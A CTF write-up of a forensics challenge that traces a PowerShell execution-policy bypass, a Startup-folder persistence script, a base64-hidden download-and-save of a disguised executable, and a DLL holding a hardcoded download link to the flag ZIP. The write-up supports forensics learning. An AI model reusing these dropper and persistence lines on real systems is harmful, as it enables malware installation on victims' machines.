IT-Waves Finals writeups 2025
IT-Waves Finals CTF
In this post, I'll walk through some of the challenges from the IT-Waves Finals CTF and how I approached them.
Challenge 1: Lupin - DFIR
Description
We were given a single file: Lupin.id1. That's all.
Analysis
Checking the command history revealed this line:
powershell.exe -ExecutionPolicy Bypass -EncodedCommand cG93ZXJzaGVsbC5leGUgLUV4ZWN1dGlvbkRvbWFpbiBCeXBhc3MgLUZpbGUgQzpcVXNlcnNcTXJUb2dvb1xBcHBEYXRhXFJvYW1pbmdcTWljcm9zb2Z0XFdpbmRvd3NcU3RhcnQgTWVudVxQcm9ncmFtc1xTdGFydHVwXHByb21vLnBzMQ==
It's clearly Base64-encoded. Decoding it gives :
powershell.exe -ExecutionDomain Bypass -File C:\Users\MrTogoo\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\promo.ps1
Solution
This led us to the promo.ps1 script. Here's what it contained:
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;
$b64 = "aHR0cHM6Ly9jdGYuY3liZXJzcGFjZS5leGFtcGxlLmNvbS9zY3Zob3N0LmV4ZQ==";
$url = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b64));
$dest = -join @("C:","\","Wi","ndow","s","\S","y","sMa","in",".","exe");
Decoding the URL yields :
https://ctf.cyberspace.example.com/scvhost.exe
Although the link was dead, we found that the script saved the binary as SysMain.exe using an obfuscated path.
140001468 __main()
140001474 char const* const var_68 = "C:\Windows\user32.dll"
14000147f char const* const var_60 = "C:\Windows\secur32.dll"
14000148a char const* const var_58 = "C:\Windows\kernel32.dll"
140001495 char const* const var_50 = "C:\Windows\shell32.dll"
1400014a0 char const* const var_48 = "C:\Windows\user36.dll"
1400014ab char const* const var_40 = "C:\Windows\advapi32.dll"
1400014b6 char const* const var_38 = "C:\Windows\ws2_32.dll"
1400014c1 char const* const var_30 = "C:\Windows\gdi32.dll"
1400014cc char const* const var_28 = "C:\Windows\msvcrt.dll"
1400014d7 char const* const var_20 = "C:\Windows\comdlg32.dll"
1400014db int32_t var_10 = 0xa
1400014db
14000155e for (int32_t i = 0; i s< var_10; i += 1)
14000150a if (LoadLibraryA((&var_68)[sx.q(i)]) != 0)
14000154f __mingw_printf("Successfully loaded DLL: %s\n", (&var_68)[sx.q(i)])
14000150a else
140001513 GetLastError()
140001531 __mingw_printf("Failed to load DLL: %s (Error: %…", (&var_68)[sx.q(i)])
140001531
14000156c while (true)
14000156c Sleep(0xea60)
analysing it, The binary loads multiple system DLLs and among them is a suspicious one: user36.dll (non-standard), Analyzing user36.dll further, we discovered a hardcoded URL pointing to a ZIP file:
30f9ea058 char const data_30f9ea058[0xee] = "https://download1529.mediafire.com/zunoak6a5u5glqQdafJviNiFzhVrk33hYWTsCj62HRen83qU8CTWeSniyXYY1HnoeZwPSEeH"
30f9ea058 "LWG2_S0ndAHcMBOEo85XfoYNtZI0ypvpgv6R9ENJtcdmWi48cJZ8TjDYl24jY3CjKevyZNAwQk1jIqtX9ygsWp3NhptkGy0QgRgP/6vxi2yxw8btaw3r/passwords.zip", 0
30f9ea146 char const data_30f9ea146[0x13] = "Error opening URL.", 0
Once downloaded and extracted, we cracked the ZIP and found the flag inside a text file, a simple grep did the job.
Flag
CSP{N0TH1NG_34SY_1N_DF1R}
[More writeups after the exams...]